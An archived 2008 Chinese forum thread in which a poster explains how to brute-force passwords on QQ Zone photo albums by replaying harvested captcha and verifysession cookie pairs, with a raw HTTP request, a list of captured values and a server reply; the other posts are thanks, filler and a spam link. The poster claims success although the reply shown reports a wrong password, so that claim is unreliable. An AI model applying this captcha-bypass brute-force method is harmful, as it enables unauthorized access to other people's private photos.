君临天下论坛's Archiver

RiZhao 发表于 2008-4-22 21:38

破解相册密码(有点复杂)

破解QQ空间相册密码绕过验证码的方法<BR>只是提供一种思路<BR><BR>现在相册加了验证码所以以前我写的QQ相册密码破解工具已经没用了<BR><BR>今天我想到这个方法就是绕过验证码进行破解的<BR>看演示<BR><BR>GET /cgi-bin/common/cgi_view_album?uin=215927967&amp;refer=qzone&amp;albumid=118370506&amp;password=8277e0910d750195b448797616e091ad&amp;verifycode=6em3 HTTP/1.1<BR>Accept: */*<BR>Accept-Language: zh-cn<BR>Referer: <A href="http://photo.qq.com/proxy.html" target=_blank><FONT color=#333333>http://photo.qq.com/proxy.html</FONT></A><BR>If-Modified-Since: 0<BR>Accept-Encoding: gzip, deflate<BR>User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)<BR>Host: photo.qq.com<BR>Connection: Keep-Alive<BR>Cookie: pvid=52343013; flv=9.0; uin_cookie=104705883; euin_cookie=AQAYPyD/qOQasqBS3xpgl2mx65lA5T0103B3GAAAAAGLrApKgStQ07DCCN40kdjHcKYiGw==; zzpanelkey=; zzpaneluin=; qqmusic_fromtag=6; beVip=0; jump=4; verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000<BR><BR>这个是向服务器提交的数据<BR>215927967这个是QQ号码<BR>118370506这个是相册ID值<BR>在相册也可看到的<BR>8277e0910d750195b448797616e091ad<BR>这个是MD5加密的密码<BR>verifycode=6em3<BR>这个就是验证码了<BR><BR>看服务器给我们的验证码返回了什么值<BR><BR>verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000<BR>研究不出是什么方式加密的<BR>肯定也用了MD5吧<BR>我用的是另一种方式<BR>我记录下几组验证玛和值就不可以进行破解了吗<BR>用工具向服务器提交我们自定义的数据和Cookie的值当然是验证码的值了<BR>hsmr&nbsp; 值:fadce5ed661a163353a675077362dca2860767ed9af299b83ad80a628523b04b<BR>ung5&nbsp; 值:a68cb3278e5a239ddcbf7bcfbd52b51e62308a01310960e01be3f5307281132c<BR>9upg&nbsp; &nbsp; cc1105f8b1741c696fbf2df5b73b024561b5aa1b03da4264409a2924075b6b9e<BR>yfhx&nbsp; &nbsp; d3a35df6f3d612d27130d90d2d098597403e0fe7a16b8a6195c6c901e472696f<BR>yrkv&nbsp; &nbsp; 9b570ef0e772743724bd853fde8e56226af5f9456dad48a75f7d03f5a29fb6dc<BR><BR>可以了<BR>我用ASP写了个随机返回验证码和值的网页<BR>然后用工具获取这些值再向腾讯的服务器提交我们自定义好的数据<BR>我把上面收集好的验证码和值添加到数据库里了<BR>然后用网页进行随机输出<BR>看我写的工具<BR><BR>代码就不做详细的解释了<BR><BR>呵呵<BR>看返回了什么<BR><BR>HTTP/1.1 200 OK<BR>Date: Mon, 05 Nov 2007 07:49:19 GMT<BR>Server: Apache<BR>Cache-Control: max-age=0<BR>Expires: Mon, 05 Nov 2007 07:49:19 GMT<BR>Connection: close<BR>Transfer-Encoding: chunked<BR>Content-Type: text/xml<BR><BR>28<BR>&lt;?xml version="1.0" encoding="gb2312"?&gt;<BR><BR>9<BR>&lt;return&gt;<BR><BR>11<BR>&lt;value&gt;0&lt;/value&gt;<BR><BR>48<BR>&lt;msg&gt;&lt;![CDATA[您所要查看的相册需要给出正确的密码才能访问!(805)]]&gt;&lt;/msg&gt;<BR><BR>a<BR>&lt;/return&gt;<BR><BR>成功破解了<BR>只要我们收集的验证码够多就可以进行暴力破解

gonggu 发表于 2008-4-23 00:15

感谢楼主发好帖,顶一把!::'(

imovidai 发表于 2008-7-9 20:44

[url=http://www.yamaru.com.cn]qq空间相册密码破解[/url]基本上很难

wenjie8996 发表于 2008-8-7 13:41

::'( ::'( 冒个泡!~!~!~

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.